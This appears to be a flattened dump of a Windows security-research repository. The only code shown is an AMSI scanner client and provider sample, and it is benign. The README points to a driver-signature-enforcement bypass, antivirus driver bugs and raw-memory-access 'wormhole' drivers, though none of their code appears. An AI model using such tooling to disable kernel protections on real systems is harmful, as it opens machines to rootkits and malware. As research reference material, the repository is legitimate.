├── LICENSE ├── README.md ├── bin ├── ApiSetSchemaView.exe ├── DSEPatch.exe ├── DrvTools │ ├── DrvTools32.exe │ └── DrvTools64.exe ├── ROS │ ├── win32u.dll │ └── win32u_checked.dll ├── StripDebug.exe └── wdextract │ ├── wdextract.exe │ └── zlibwapi.dll ├── docs └── VIRLIST_UTF8.txt └── source ├── AMSI ├── AmsiProviderATL │ ├── AmsiClient │ │ ├── AmsiClient.cpp │ │ ├── AmsiClient.vcxproj │ │ ├── AmsiClient.vcxproj.filters │ │ ├── AmsiClient.vcxproj.user │ │ ├── pch.cpp │ │ └── pch.h │ ├── AmsiScan.sln │ └── AmsiServer │ │ ├── AmsiScan │ │ ├── AmsiProvider.cpp │ │ ├── AmsiProvider.h │ │ ├── AmsiProvider.rgs │ │ ├── AmsiScan.cpp │ │ ├── AmsiScan.def │ │ ├── AmsiScan.idl │ │ ├── AmsiScan.rc │ │ ├── AmsiScan.rgs │ │ ├── AmsiScan.vcxproj │ │ ├── AmsiScan.vcxproj.filters │ │ ├── AmsiScan.vcxproj.user │ │ ├── AmsiScan_i.c │ │ ├── AmsiScan_i.h │ │ ├── AmsiScan_p.c │ │ ├── AmsiScanps.def │ │ ├── dlldata.c │ │ ├── dllmain.cpp │ │ ├── dllmain.h │ │ ├── resource.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ └── targetver.h │ │ └── AmsiScanPS │ │ ├── AmsiScanPS.vcxproj │ │ ├── AmsiScanPS.vcxproj.filters │ │ └── AmsiScanPS.vcxproj.user └── AmsiProviderC │ ├── AmsiProviderServer.sln │ └── AmsiProviderServer │ ├── AmsiProviderServer.vcxproj │ ├── AmsiProviderServer.vcxproj.filters │ ├── AmsiProviderServer.vcxproj.user │ ├── classfactory.c │ ├── classfactory.h │ ├── exports.def │ ├── global.h │ ├── main.c │ └── minirtl │ ├── _strcat.c │ ├── _strcpy.c │ ├── _strend.c │ ├── _strlen.c │ ├── minirtl.h │ ├── rtltypes.h │ ├── u64tohex.c │ └── ultohex.c ├── ApiSetSchema ├── 1.manifest ├── ApiSetSchemaView.sln ├── ApiSetSchemaView.vcxproj ├── ApiSetSchemaView.vcxproj.filters ├── ApiSetSchemaView.vcxproj.user ├── Resource.rc ├── apisetx.h ├── icon_gears.ico ├── main.c ├── minirtl │ ├── _strcat.c │ ├── _strcmpi.c │ ├── _strcpy.c │ ├── _strend.c │ ├── _strlen.c │ ├── _strncmpi.c │ ├── _strncpy.c │ ├── _strstr.c │ ├── minirtl.h │ ├── rtltypes.h │ └── ultostr.c ├── ntos.h ├── resource.h ├── 
treelist.c └── treelist.h ├── DSEPatch ├── DSEPatch.sln ├── DSEPatch │ ├── DSEPatch.vcxproj │ ├── DSEPatch.vcxproj.filters │ ├── DSEPatch.vcxproj.user │ ├── cui │ │ ├── cui.c │ │ └── cui.h │ ├── global.h │ ├── hde │ │ ├── hde64.c │ │ ├── hde64.h │ │ ├── pstdint.h │ │ └── table64.h │ ├── instdrv.c │ ├── instdrv.h │ ├── main.c │ ├── minirtl │ │ ├── _strcat.c │ │ ├── _strcmp.c │ │ ├── _strcmpi.c │ │ ├── _strcpy.c │ │ ├── _strend.c │ │ ├── _strlen.c │ │ ├── _strncmp.c │ │ ├── _strncmpi.c │ │ ├── _strncpy.c │ │ ├── cmdline.c │ │ ├── cmdline.h │ │ ├── minirtl.h │ │ ├── rtltypes.h │ │ ├── u64tohex.c │ │ ├── u64tostr.c │ │ ├── ultohex.c │ │ └── ultostr.c │ ├── ntdll │ │ └── ntos.h │ ├── resource.h │ ├── resource.rc │ ├── se_patterns.h │ ├── sup.c │ ├── sup.h │ ├── vbox.h │ └── vboxdrv.h ├── README.md └── changelog.txt ├── DrvTools ├── readme.txt └── src │ ├── DrvTools.ico │ ├── DrvTools.lpi │ ├── DrvTools.lpr │ ├── DrvTools.lps │ ├── DrvTools.res │ ├── link.res │ ├── nativesup.pas │ ├── ntstatus.inc │ ├── ppas.bat │ ├── rsrc │ ├── about64.ico │ └── main.ico │ ├── scmsup.pas │ ├── unit1.lfm │ └── unit1.pas ├── IntelNal ├── COPYING ├── Kconfig ├── Makefile ├── README.md ├── inc │ ├── cardbus_t.h │ ├── files.txt │ ├── hwbus_t.h │ ├── linux │ │ ├── files.txt │ │ ├── linuxdriverdevice_i.h │ │ ├── linuxnaldriver.h │ │ ├── linuxnalioctl.h │ │ ├── linuxos_i.h │ │ └── linuxpci_i.h │ ├── nal.h │ ├── nalcodes.h │ ├── nalioctl.h │ ├── naltypes.h │ ├── os_i.h │ ├── osdevice_i.h │ ├── pci_i.h │ └── pci_t.h └── src │ ├── files.txt │ ├── iqvlinux.spec │ ├── linuxdriverdevice_i.c │ ├── linuxdriveros_i.c │ ├── linuxdriverpci_i.c │ ├── linuxnaldriver.c │ ├── nalinstall │ └── nalioctldrv.c ├── ROS ├── srvany2 │ ├── srvany2.sln │ └── srvany2 │ │ ├── main.c │ │ ├── minirtl │ │ ├── _strcat.c │ │ ├── _strcpy.c │ │ ├── _strlen.c │ │ ├── cmdline.c │ │ ├── cmdline.h │ │ ├── minirtl.h │ │ └── rtltypes.h │ │ ├── srvany2.vcxproj │ │ ├── srvany2.vcxproj.filters │ │ └── srvany2.vcxproj.user └── win32u │ 
├── win32u.sln │ └── win32u │ ├── main.c │ ├── resource.h │ ├── ver.rc │ ├── w32kcall.h │ ├── w32kcall_checked.h │ ├── w32parguments.h │ ├── w32parguments_checked.h │ ├── win32u.vcxproj │ ├── win32u.vcxproj.filters │ ├── win32u.vcxproj.user │ ├── win32u_export.def │ └── win32u_export_checked.def ├── SecTrash ├── asusgio2.c ├── bkavsp.c ├── enetech.c ├── glckio2.c ├── iobit_winring0.c ├── iobitcallbacks.c ├── logitech.c ├── maxproc64.c ├── readme.txt ├── secureaplus.c └── superantispyware.c ├── StripDebug ├── StripDebug.sln ├── StripDebug.vcxproj ├── StripDebug.vcxproj.filters ├── StripDebug.vcxproj.user ├── cui.c ├── cui.h ├── global.h ├── main.c └── minirtl │ ├── _strcat.c │ ├── _strcpy.c │ ├── _strlen.c │ ├── cmdline.c │ ├── cmdline.h │ ├── minirtl.h │ └── rtltypes.h ├── WormholeDrivers ├── INPOUT │ ├── HWInterfaceDrv.sln │ ├── HWInterfaceDrv.vcproj │ ├── MAKEFILE │ ├── ReadMe.txt │ ├── SOURCES │ ├── hwinterfacedrv.c │ ├── hwinterfacedrv.h │ ├── hwinterfacedrv.rc │ └── license.txt ├── MAPMEM │ ├── DIRS │ ├── EXE │ │ ├── MAKEFILE │ │ ├── MAPTEST.C │ │ ├── MAPTEST.MAK │ │ └── SOURCES │ ├── README.TXT │ └── SYS │ │ ├── MAKEFILE │ │ ├── MAPMEM.C │ │ ├── MAPMEM.H │ │ ├── MAPMEM.INI │ │ └── SOURCES ├── PHYMEM │ ├── LICENSE │ ├── LICENSE.html │ ├── PCIFlt │ │ ├── DebugPrint.c │ │ ├── DebugPrint.h │ │ ├── PCIFilter.c │ │ ├── PCIFilter.h │ │ ├── PCIFlt.dsp │ │ ├── PCIFlt.dsw │ │ └── Release │ │ │ ├── PCIFilter.inf │ │ │ └── PCIFlt.sys │ └── PhyMem │ │ ├── driver │ │ ├── AccessBus.c │ │ ├── DebugPrint.c │ │ ├── DebugPrint.h │ │ ├── phymem.c │ │ ├── phymem.dsp │ │ ├── phymem.dsw │ │ └── phymem.h │ │ ├── pmdll │ │ ├── Release │ │ │ └── pmdll.lib │ │ ├── initdrv.cpp │ │ ├── phymem.h │ │ ├── pmdll.cpp │ │ ├── pmdll.dsp │ │ ├── pmdll.dsw │ │ └── pmdll.h │ │ └── test │ │ ├── pmdll.h │ │ ├── pmdll.lib │ │ ├── test.cpp │ │ ├── test.dsp │ │ └── test.dsw ├── WINIO │ ├── .gitignore │ ├── LICENSE │ ├── README.md │ ├── Samples │ │ ├── DumpPhys │ │ │ ├── DumpPhys.sln │ │ │ ├── 
DumpPhys.suo │ │ │ └── DumpPhys │ │ │ │ ├── DumpPhys.csproj │ │ │ │ ├── DumpPhys.manifest │ │ │ │ ├── Form1.Designer.cs │ │ │ │ ├── Form1.cs │ │ │ │ ├── Form1.resx │ │ │ │ ├── Program.cs │ │ │ │ └── Properties │ │ │ │ ├── AssemblyInfo.cs │ │ │ │ ├── Resources.Designer.cs │ │ │ │ ├── Resources.resx │ │ │ │ ├── Settings.Designer.cs │ │ │ │ └── Settings.settings │ │ └── DumpPort │ │ │ ├── DumpPort.sln │ │ │ ├── DumpPort.suo │ │ │ └── DumpPort │ │ │ ├── DumpPort.csproj │ │ │ ├── DumpPort.manifest │ │ │ ├── Form1.Designer.cs │ │ │ ├── Form1.cs │ │ │ ├── Form1.resx │ │ │ ├── Program.cs │ │ │ └── Properties │ │ │ ├── AssemblyInfo.cs │ │ │ ├── Resources.Designer.cs │ │ │ ├── Resources.resx │ │ │ ├── Settings.Designer.cs │ │ │ └── Settings.settings │ └── Source │ │ ├── Dll │ │ ├── InstDrv.cpp │ │ ├── Phys32.cpp │ │ ├── Phys32.h │ │ ├── Port32.cpp │ │ ├── Port32.h │ │ ├── WinIo.aps │ │ ├── WinIo.cpp │ │ ├── WinIo.def │ │ ├── WinIo.rc │ │ ├── WinIo.sln │ │ ├── WinIo.suo │ │ ├── WinIo.vcproj │ │ ├── resource.h │ │ └── winio.h │ │ └── Drv │ │ ├── MAKEFILE │ │ ├── SOURCES │ │ ├── WinIo.c │ │ └── winio_nt.h ├── WINRING0 │ ├── LICENSE │ ├── README.md │ ├── dll │ │ ├── Driver.cpp │ │ ├── Driver.h │ │ ├── OlsApi.cpp │ │ ├── OlsApi.def │ │ ├── OlsApi.h │ │ ├── OlsApiInit.h │ │ ├── OlsApiInitDef.h │ │ ├── OlsApiInitExt.h │ │ ├── OlsDef.h │ │ ├── OlsDll.cpp │ │ ├── OlsDll.h │ │ ├── OlsDll.rc │ │ ├── OlsIoctl.h │ │ ├── resource.h │ │ ├── stdafx.cpp │ │ ├── stdafx.h │ │ ├── sys │ │ │ ├── MAKEFILE │ │ │ ├── OpenLibSys.c │ │ │ ├── OpenLibSys.h │ │ │ ├── OpenLibSys.rc │ │ │ └── SOURCES │ │ └── vxd │ │ │ ├── Makefile │ │ │ ├── OpenLS.c │ │ │ ├── OpenLS.def │ │ │ ├── OpenLS.h │ │ │ ├── OpenLS.rc │ │ │ └── ctrl.asm │ └── drv │ │ ├── DriverApi.c │ │ ├── DriverApi.h │ │ ├── DriverIoCtl.h │ │ └── DriverManage.c └── readme.txt └── wdextract ├── README.md ├── wdextract.sln └── wdextract ├── pch.cpp ├── pch.h ├── wdextract.cpp ├── wdextract.vcxproj ├── wdextract.vcxproj.filters ├── 
wdextract.vcxproj.user ├── zconf.h ├── zlib.h └── zlibwapi.lib /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 - 2022 hfiref0x 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Misc
2 |
3 | ### Miscellaneous Code and Docs
4 |
5 | docs
6 | * docs (mostly for historical purposes)
7 |
8 | bin
9 | * compiled versions of some of the tools listed below
10 |
11 | source\ApiSetSchemaView
12 | * Windows ApiSetSchema Viewer (V2, V4, V6)
13 |
14 | source\StripDebug
15 | * Removes debug information left by Visual Studio 2015+
16 |
17 | source\AMSI
18 | * AMSI-related experiments
19 | * source\AMSI\AmsiProviderATL
20 | AMSI provider client/server written in C++ using ATL
21 | * source\AMSI\AmsiProviderC
22 | AMSI provider server written in C (works with the client from the ATL version)
23 |
24 | source\IntelNal
25 | * Intel QV Linux kernel driver (uploaded for quick reference)
26 |
27 | source\ROS
28 | * ReactOS-related code
29 | * source\ROS\win32u
30 | ReactOS win32u dll (0.4.10 - 0.4.14)
31 | * source\ROS\srvany2
32 | Run an application as a service
33 |
34 | source\SecTrash
35 | * Various AV/Security bugs and related trash found at the beginning of 2020
36 |
37 | source\WormholeDrivers
38 | * Collection of "wormhole" open source drivers widely used by hardware vendors, sometimes in an unmodified state
39 |
40 | source\DSEPatch
41 | * DSE patch based on modification of CI callbacks; see dsepatch\readme for more info
42 |
43 | source\wdextract (for a more advanced version visit https://github.com/hfiref0x/wdextract)
44 | * Extracts the Windows Defender database from vdm files and unpacks it
45 |
46 | source\DrvTools
47 | * Auxiliary utility for working with Windows drivers
48 |
49 | # Authors
50 | * (c) Daniloff & Co
51 | * (c) Intel QV authors
52 | * (c) PHYMEM, MAPMEM, WINIO, WINRING0 authors
53 | * (c) hfiref0x tools/source 2015 - 2023, hfiref0x
54 |
--------------------------------------------------------------------------------
/bin/ApiSetSchemaView.exe:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/ApiSetSchemaView.exe -------------------------------------------------------------------------------- /bin/DSEPatch.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/DSEPatch.exe -------------------------------------------------------------------------------- /bin/DrvTools/DrvTools32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/DrvTools/DrvTools32.exe -------------------------------------------------------------------------------- /bin/DrvTools/DrvTools64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/DrvTools/DrvTools64.exe -------------------------------------------------------------------------------- /bin/ROS/win32u.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/ROS/win32u.dll -------------------------------------------------------------------------------- /bin/ROS/win32u_checked.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/ROS/win32u_checked.dll -------------------------------------------------------------------------------- /bin/StripDebug.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/StripDebug.exe 
-------------------------------------------------------------------------------- /bin/wdextract/wdextract.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/wdextract/wdextract.exe -------------------------------------------------------------------------------- /bin/wdextract/zlibwapi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/bin/wdextract/zlibwapi.dll -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "amsi.lib") 6 | 7 | int main() 8 | { 9 | std::cout << "Hello World!\n"; 10 | 11 | HRESULT hr = CoInitializeEx(0, COINIT_MULTITHREADED); 12 | 13 | if (!SUCCEEDED(hr)) { 14 | std::cout << "CoInitializeEx error = " << std::hex << hr << "\n"; 15 | return -1; 16 | } 17 | 18 | HAMSICONTEXT amsiContext = nullptr; 19 | 20 | hr = AmsiInitialize(L"Amsi Scanner", &amsiContext); 21 | if (!SUCCEEDED(hr)) { 22 | std::cout << "AmsiInitialize error = " << std::hex << hr << "\n"; 23 | return -2; 24 | } 25 | 26 | HAMSISESSION amsiSession = nullptr; 27 | hr = AmsiOpenSession(amsiContext, &amsiSession); 28 | if (!SUCCEEDED(hr)) { 29 | std::cout << "AmsiOpenSession error = " << std::hex << hr << "\n"; 30 | return -2; 31 | } 32 | 33 | UCHAR ScanBuffer[] = "Scanned buffer"; 34 | 35 | AMSI_RESULT ScanResult; 36 | hr = AmsiScanBuffer(amsiContext, ScanBuffer, sizeof(ScanBuffer), L"ScanContentName", amsiSession, &ScanResult); 37 | if (!SUCCEEDED(hr)) { 38 | std::cout << "AmsiScanBuffer error = " << std::hex << hr << "\n"; 39 | return -2; 40 | } 41 | 42 | if (AmsiResultIsMalware(ScanResult)) { 43 | 
std::cout << "Malware detected." << "\n"; 44 | } 45 | else { 46 | std::cout << "Not detected." << "\n"; 47 | } 48 | 49 | AmsiCloseSession(amsiContext, amsiSession); 50 | AmsiUninitialize(amsiContext); 51 | CoUninitialize(); 52 | } 53 | 54 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/AmsiClient.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiClient/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. 
Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiScan.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanServer", "AmsiServer\AmsiScan\AmsiScan.vcxproj", "{D131A205-F090-4CF5-8441-32074FE5398E}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanPS", "AmsiServer\AmsiScanPS\AmsiScanPS.vcxproj", "{19E4CA54-321F-481D-A457-48C4E3F3E85C}" 9 | ProjectSection(ProjectDependencies) = postProject 10 | {D131A205-F090-4CF5-8441-32074FE5398E} = {D131A205-F090-4CF5-8441-32074FE5398E} 11 | EndProjectSection 12 | EndProject 13 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiClient", "AmsiClient\AmsiClient.vcxproj", "{CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}" 14 | EndProject 15 | Global 16 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 17 | Debug|x64 = Debug|x64 18 | Debug|x86 = Debug|x86 19 | Release|x64 = Release|x64 20 | Release|x86 = Release|x86 21 | EndGlobalSection 22 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 23 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.ActiveCfg = Debug|x64 24 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.Build.0 = Debug|x64 25 | 
{D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.ActiveCfg = Debug|Win32 26 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.Build.0 = Debug|Win32 27 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.ActiveCfg = Release|x64 28 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.Build.0 = Release|x64 29 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.ActiveCfg = Release|Win32 30 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.Build.0 = Release|Win32 31 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x64.ActiveCfg = Debug|x64 32 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x86.ActiveCfg = Debug|Win32 33 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x64.ActiveCfg = Release|x64 34 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x86.ActiveCfg = Release|Win32 35 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.ActiveCfg = Debug|x64 36 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.Build.0 = Debug|x64 37 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.ActiveCfg = Debug|Win32 38 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.Build.0 = Debug|Win32 39 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.ActiveCfg = Release|x64 40 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.Build.0 = Release|x64 41 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.ActiveCfg = Release|Win32 42 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.Build.0 = Release|Win32 43 | EndGlobalSection 44 | GlobalSection(SolutionProperties) = preSolution 45 | HideSolutionNode = FALSE 46 | EndGlobalSection 47 | GlobalSection(ExtensibilityGlobals) = postSolution 48 | SolutionGuid = {C3FB4B87-8F9C-4BDC-BE98-48B9ACE36E15} 49 | EndGlobalSection 50 | EndGlobal 51 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.h: -------------------------------------------------------------------------------- 1 | // AmsiProvider.h : Declaration of the CAmsiProvider 2 | 3 | #pragma once 4 
| #include "resource.h" // main symbols 5 | 6 | 7 | 8 | #include "AmsiScan_i.h" 9 | #include 10 | 11 | 12 | #if defined(_WIN32_WCE) && !defined(_CE_DCOM) && !defined(_CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA) 13 | #error "Single-threaded COM objects are not properly supported on Windows CE platform, such as the Windows Mobile platforms that do not include full DCOM support. Define _CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA to force ATL to support creating single-thread COM object's and allow use of it's single-threaded COM object implementations. The threading model in your rgs file was set to 'Free' as that is the only threading model supported in non DCOM Windows CE platforms." 14 | #endif 15 | 16 | using namespace ATL; 17 | 18 | 19 | // CAmsiProvider 20 | 21 | class ATL_NO_VTABLE CAmsiProvider : 22 | public CComObjectRootEx, 23 | public CComCoClass, 24 | public IAntimalwareProvider 25 | { 26 | public: 27 | CAmsiProvider() 28 | { 29 | } 30 | 31 | DECLARE_REGISTRY_RESOURCEID(IDR_AMSIPROVIDER) 32 | 33 | 34 | BEGIN_COM_MAP(CAmsiProvider) 35 | COM_INTERFACE_ENTRY(IAntimalwareProvider) 36 | END_COM_MAP() 37 | 38 | 39 | 40 | DECLARE_PROTECT_FINAL_CONSTRUCT() 41 | 42 | HRESULT FinalConstruct() 43 | { 44 | return S_OK; 45 | } 46 | 47 | void FinalRelease() 48 | { 49 | } 50 | 51 | public: 52 | 53 | HRESULT STDMETHODCALLTYPE Scan( 54 | _In_ IAmsiStream *stream, 55 | _Out_ AMSI_RESULT *result); 56 | 57 | void STDMETHODCALLTYPE CloseSession( 58 | _In_ ULONGLONG session); 59 | 60 | HRESULT STDMETHODCALLTYPE DisplayName( 61 | _Outptr_ LPWSTR *displayName); 62 | 63 | }; 64 | 65 | OBJECT_ENTRY_AUTO(__uuidof(AmsiProvider), CAmsiProvider) 66 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | NoRemove CLSID 4 | { 5 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider' 6 | 
{ 7 | ForceRemove Programmable 8 | InprocServer32 = s '%MODULE%' 9 | { 10 | val ThreadingModel = s 'Both' 11 | } 12 | } 13 | } 14 | } 15 | 16 | HKLM 17 | { 18 | NoRemove SOFTWARE { 19 | NoRemove Microsoft { 20 | NoRemove AMSI { 21 | NoRemove Providers { 22 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider' 23 | } 24 | } 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.cpp: -------------------------------------------------------------------------------- 1 | // AmsiScan.cpp : Implementation of DLL Exports. 2 | 3 | 4 | #include "stdafx.h" 5 | #include "resource.h" 6 | #include "AmsiScan_i.h" 7 | #include "dllmain.h" 8 | 9 | 10 | using namespace ATL; 11 | 12 | // Used to determine whether the DLL can be unloaded by OLE. 13 | _Use_decl_annotations_ 14 | STDAPI DllCanUnloadNow(void) 15 | { 16 | return _AtlModule.DllCanUnloadNow(); 17 | } 18 | 19 | // Returns a class factory to create an object of the requested type. 20 | _Use_decl_annotations_ 21 | STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv) 22 | { 23 | return _AtlModule.DllGetClassObject(rclsid, riid, ppv); 24 | } 25 | 26 | // DllRegisterServer - Adds entries to the system registry. 27 | _Use_decl_annotations_ 28 | STDAPI DllRegisterServer(void) 29 | { 30 | // registers object, typelib and all interfaces in typelib 31 | HRESULT hr = _AtlModule.DllRegisterServer(); 32 | return hr; 33 | } 34 | 35 | // DllUnregisterServer - Removes entries from the system registry. 36 | _Use_decl_annotations_ 37 | STDAPI DllUnregisterServer(void) 38 | { 39 | HRESULT hr = _AtlModule.DllUnregisterServer(); 40 | return hr; 41 | } 42 | 43 | // DllInstall - Adds/Removes entries to the system registry per user per machine. 
44 | STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine) 45 | { 46 | HRESULT hr = E_FAIL; 47 | static const wchar_t szUserSwitch[] = L"user"; 48 | 49 | if (pszCmdLine != nullptr) 50 | { 51 | if (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0) 52 | { 53 | ATL::AtlSetPerUserRegistration(true); 54 | } 55 | } 56 | 57 | if (bInstall) 58 | { 59 | hr = DllRegisterServer(); 60 | if (FAILED(hr)) 61 | { 62 | DllUnregisterServer(); 63 | } 64 | } 65 | else 66 | { 67 | hr = DllUnregisterServer(); 68 | } 69 | 70 | return hr; 71 | } 72 | 73 | 74 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.def: -------------------------------------------------------------------------------- 1 | ; AmsiScan.def : Declares the module parameters. 2 | 3 | LIBRARY 4 | 5 | EXPORTS 6 | DllCanUnloadNow PRIVATE 7 | DllGetClassObject PRIVATE 8 | DllRegisterServer PRIVATE 9 | DllUnregisterServer PRIVATE 10 | DllInstall PRIVATE 11 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.idl: -------------------------------------------------------------------------------- 1 | // AmsiScan.idl : IDL source for AmsiScan 2 | // 3 | 4 | // This file will be processed by the MIDL tool to 5 | // produce the type library (AmsiScan.tlb) and marshalling code. 
